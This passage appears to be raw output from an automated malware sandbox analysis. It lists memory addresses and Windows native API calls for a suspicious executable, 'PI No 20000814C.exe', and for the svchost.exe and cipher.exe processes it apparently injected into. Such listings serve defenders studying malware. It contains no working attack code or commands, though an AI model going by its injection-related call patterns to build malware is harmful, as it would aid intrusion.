            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_053A2BF0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2BE0 NtQueryValueKey,LdrInitializeThunk,4_2_053A2BE0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2AF0 NtWriteFile,LdrInitializeThunk,4_2_053A2AF0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2AD0 NtReadFile,LdrInitializeThunk,4_2_053A2AD0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A35C0 NtCreateMutant,LdrInitializeThunk,4_2_053A35C0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A39B0 NtGetContextThread,LdrInitializeThunk,4_2_053A39B0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2D00 NtSetInformationFile,4_2_053A2D00
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2DB0 NtEnumerateKey,4_2_053A2DB0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2C00 NtQueryInformationProcess,4_2_053A2C00
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2CF0 NtOpenProcess,4_2_053A2CF0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2CC0 NtQueryVirtualMemory,4_2_053A2CC0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2F60 NtCreateProcessEx,4_2_053A2F60
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2FA0 NtQuerySection,4_2_053A2FA0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2F90 NtProtectVirtualMemory,4_2_053A2F90
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2E30 NtWriteVirtualMemory,4_2_053A2E30
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2EA0 NtAdjustPrivilegesToken,4_2_053A2EA0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2B80 NtQueryInformationFile,4_2_053A2B80
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2AB0 NtWaitForSingleObject,4_2_053A2AB0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A3010 NtOpenDirectoryObject,4_2_053A3010
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A3090 NtSetValueKey,4_2_053A3090
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A3D10 NtOpenProcessToken,4_2_053A3D10
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A3D70 NtOpenThread,4_2_053A3D70
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032D7B90 NtReadFile,4_2_032D7B90
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032D7A30 NtCreateFile,4_2_032D7A30
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032D7E70 NtAllocateVirtualMemory,4_2_032D7E70
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032D7D20 NtClose,4_2_032D7D20
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032D7C80 NtDeleteFile,4_2_032D7C80
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F640B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00F640B1
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F58858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74B55590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,0_2_00F58858
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F6545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00F6545F
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F0E8000_2_00F0E800
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F2DBB50_2_00F2DBB5
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F0E0600_2_00F0E060
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F8804A0_2_00F8804A
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F141400_2_00F14140
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F224050_2_00F22405
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F365220_2_00F36522
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F3267E0_2_00F3267E
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F806650_2_00F80665
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F168430_2_00F16843
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F2283A0_2_00F2283A
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F389DF0_2_00F389DF
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F80AE20_2_00F80AE2
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F36A940_2_00F36A94
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F18A0E0_2_00F18A0E
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F68B130_2_00F68B13
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F5EB070_2_00F5EB07
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F2CD610_2_00F2CD61
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F370060_2_00F37006
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F131900_2_00F13190
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F1710E0_2_00F1710E
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F012870_2_00F01287
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F233C70_2_00F233C7
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F2F4190_2_00F2F419
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F216C40_2_00F216C4
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F156800_2_00F15680
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F278D30_2_00F278D3
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F158C00_2_00F158C0
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F21BB80_2_00F21BB8
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F39D050_2_00F39D05
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F0FE400_2_00F0FE40
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F2BFE60_2_00F2BFE6
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F21FD00_2_00F21FD0
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_018E36900_2_018E3690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004721D02_2_004721D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00472A5D2_2_00472A5D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00472A602_2_00472A60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00471A602_2_00471A60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004712202_2_00471220
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0047FA9A2_2_0047FA9A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0047FAA32_2_0047FAA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0049D3032_2_0049D303
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004863CF2_2_004863CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004863D32_2_004863D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0047FCC32_2_0047FCC3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0047DD432_2_0047DD43
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0047255F2_2_0047255F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004725602_2_00472560
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004715302_2_00471530
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00472F602_2_00472F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC02C02_2_02FC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE02742_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030003E62_2_030003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F02_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA3522_2_02FFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030001AA2_2_030001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD20002_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF81CC2_2_02FF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF41A22_2_02FF41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC81582_2_02FC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA1182_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F301002_2_02F30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5C6E02_2_02F5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3C7C02_2_02F3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F407702_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F647502_2_02F64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEE4F62_2_02FEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030005912_2_03000591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF24462_2_02FF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE44202_2_02FE4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F405352_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA802_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF6BD72_2_02FF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFAB402_2_02FFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E8F02_2_02F6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F268B82_2_02F268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300A9A62_2_0300A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4A8402_2_02F4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F428402_2_02F42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A02_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F569622_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFEEDB2_2_02FFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52E902_2_02F52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFCE932_2_02FFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40E592_2_02F40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFEE262_2_02FFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4CFE02_2_02F4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32FC82_2_02F32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBEFA02_2_02FBEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB4F402_2_02FB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60F302_2_02F60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE2F302_2_02FE2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F82F282_2_02F82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30CF22_2_02F30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0CB52_2_02FE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40C002_2_02F40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3ADE02_2_02F3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F58DBF2_2_02F58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDCD1F2_2_02FDCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4AD002_2_02F4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE12ED2_2_02FE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5B2C02_2_02F5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F452A02_2_02F452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F8739A2_2_02F8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2D34C2_2_02F2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF132D2_2_02FF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF70E92_2_02FF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFF0E02_2_02FFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEF0CC2_2_02FEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F470C02_2_02F470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300B16B2_2_0300B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4B1B02_2_02F4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F1722_2_02F2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7516C2_2_02F7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF16CC2_2_02FF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F856302_2_02F85630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFF7B02_2_02FFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F314602_2_02F31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFF43F2_2_02FFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030095C32_2_030095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDD5B02_2_02FDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF75712_2_02FF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEDAC62_2_02FEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDDAAC2_2_02FDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F85AA02_2_02F85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE1AA32_2_02FE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB3A6C2_2_02FB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFA492_2_02FFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF7A462_2_02FF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB5BF02_2_02FB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7DBF92_2_02F7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5FB802_2_02F5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFB762_2_02FFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F438E02_2_02F438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAD8002_2_02FAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F499502_2_02F49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5B9502_2_02F5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD59102_2_02FD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F49EB02_2_02F49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F03FD22_2_02F03FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F03FD52_2_02F03FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFFB12_2_02FFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F41F922_2_02F41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFF092_2_02FFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFCF22_2_02FFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB9C322_2_02FB9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5FDC02_2_02F5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF7D732_2_02FF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF1D5A2_2_02FF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F43D402_2_02F43D40
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053705354_2_05370535
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054305914_2_05430591
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054224464_2_05422446
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054144204_2_05414420
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0541E4F64_2_0541E4F6
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053707704_2_05370770
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053947504_2_05394750
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0536C7C04_2_0536C7C0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0538C6E04_2_0538C6E0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053601004_2_05360100
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0540A1184_2_0540A118
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053F81584_2_053F8158
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054281CC4_2_054281CC
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054241A24_2_054241A2
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054301AA4_2_054301AA
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054020004_2_05402000
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542A3524_2_0542A352
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054303E64_2_054303E6
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0537E3F04_2_0537E3F0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054102744_2_05410274
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053F02C04_2_053F02C0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0537AD004_2_0537AD00
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0540CD1F4_2_0540CD1F
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05388DBF4_2_05388DBF
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0536ADE04_2_0536ADE0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05370C004_2_05370C00
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05360CF24_2_05360CF2
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05410CB54_2_05410CB5
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05390F304_2_05390F30
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053B2F284_2_053B2F28
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05412F304_2_05412F30
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053E4F404_2_053E4F40
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053EEFA04_2_053EEFA0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0537CFE04_2_0537CFE0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05362FC84_2_05362FC8
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542EE264_2_0542EE26
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05370E594_2_05370E59
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542EEDB4_2_0542EEDB
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05382E904_2_05382E90
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542CE934_2_0542CE93
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053869624_2_05386962
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053729A04_2_053729A0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0543A9A64_2_0543A9A6
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053728404_2_05372840
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0537A8404_2_0537A840
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053568B84_2_053568B8
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0539E8F04_2_0539E8F0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542AB404_2_0542AB40
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05426BD74_2_05426BD7
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0536EA804_2_0536EA80
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054275714_2_05427571
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054395C34_2_054395C3
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0540D5B04_2_0540D5B0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053614604_2_05361460
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542F43F4_2_0542F43F
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542F7B04_2_0542F7B0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053B56304_2_053B5630
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054216CC4_2_054216CC
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0543B16B4_2_0543B16B
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0535F1724_2_0535F172
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A516C4_2_053A516C
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0537B1B04_2_0537B1B0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0541F0CC4_2_0541F0CC
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542F0E04_2_0542F0E0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054270E94_2_054270E9
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053770C04_2_053770C0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542132D4_2_0542132D
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0535D34C4_2_0535D34C
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053B739A4_2_053B739A
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053752A04_2_053752A0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054112ED4_2_054112ED
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0538B2C04_2_0538B2C0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05421D5A4_2_05421D5A
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05427D734_2_05427D73
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05373D404_2_05373D40
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0538FDC04_2_0538FDC0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053E9C324_2_053E9C32
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542FCF24_2_0542FCF2
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542FF094_2_0542FF09
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05371F924_2_05371F92
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05333FD24_2_05333FD2
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05333FD54_2_05333FD5
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542FFB14_2_0542FFB1
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05379EB04_2_05379EB0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_054059104_2_05405910
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053799504_2_05379950
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0538B9504_2_0538B950
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053DD8004_2_053DD800
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053738E04_2_053738E0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542FB764_2_0542FB76
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0538FB804_2_0538FB80
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053ADBF94_2_053ADBF9
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053E5BF04_2_053E5BF0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05427A464_2_05427A46
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0542FA494_2_0542FA49
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053E3A6C4_2_053E3A6C
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0541DAC64_2_0541DAC6
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053B5AA04_2_053B5AA0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_05411AA34_2_05411AA3
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_0540DAAC4_2_0540DAAC
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032C16D04_2_032C16D0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032DA1204_2_032DA120
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032BAB604_2_032BAB60
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032BCAE04_2_032BCAE0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032BC8B74_2_032BC8B7
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032BC8C04_2_032BC8C0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032C31EC4_2_032C31EC
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032C31F04_2_032C31F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FBF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F87E54 appears 111 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F2B970 appears 280 times
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: String function: 00F28B40 appears 42 times
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: String function: 00F20D27 appears 70 times
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: String function: 00F07F41 appears 35 times
            Source: C:\Windows\SysWOW64\cipher.exeCode function: String function: 0535B970 appears 280 times
            Source: C:\Windows\SysWOW64\cipher.exeCode function: String function: 053A5130 appears 58 times
            Source: C:\Windows\SysWOW64\cipher.exeCode function: String function: 053DEA12 appears 86 times
            Source: C:\Windows\SysWOW64\cipher.exeCode function: String function: 053EF290 appears 105 times
            Source: C:\Windows\SysWOW64\cipher.exeCode function: String function: 053B7E54 appears 111 times
